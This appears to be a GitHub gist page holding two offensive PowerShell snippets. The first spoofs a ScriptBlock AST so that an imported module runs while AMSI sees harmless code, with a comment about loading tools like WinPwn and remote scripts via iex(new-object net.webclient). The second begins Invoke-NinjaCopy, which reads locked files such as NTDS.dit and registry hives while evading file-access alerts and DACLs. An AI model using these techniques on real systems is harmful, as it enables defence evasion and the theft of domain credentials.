Zaban Zab-an
Zab-an
/ gist:2ce0f16237934f853a85e7689a202f9f
Last active
August 26, 2024 14:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast | |
| $ExecutedAst = [ScriptBlock]::Create("Import-Module [CHEMIN DU SCRIPT]").Ast | |
| $Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent, | |
| $null, | |
| $null, | |
| $null, | |
| $ExecutedAst.EndBlock.Copy(), | |
| $null) | |
| $Sb = $Ast.GetScriptBlock() | |
| # Any function - such as in this case WinPwn - that you want to be executed must be already called in the Scriptblock on the remote webserver. Fun fact, scripts that are loaded by the Script itself via iex(new-object net.webclient) also bypass AMSI. |
Zab-an
/ tester.ps1
Created
August 20, 2024 14:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-NinjaCopy | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires you | |
| are an administrator of the server. This allows you to bypass the following protections: | |
| 1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives | |
| 2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue) | |
| 3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a file |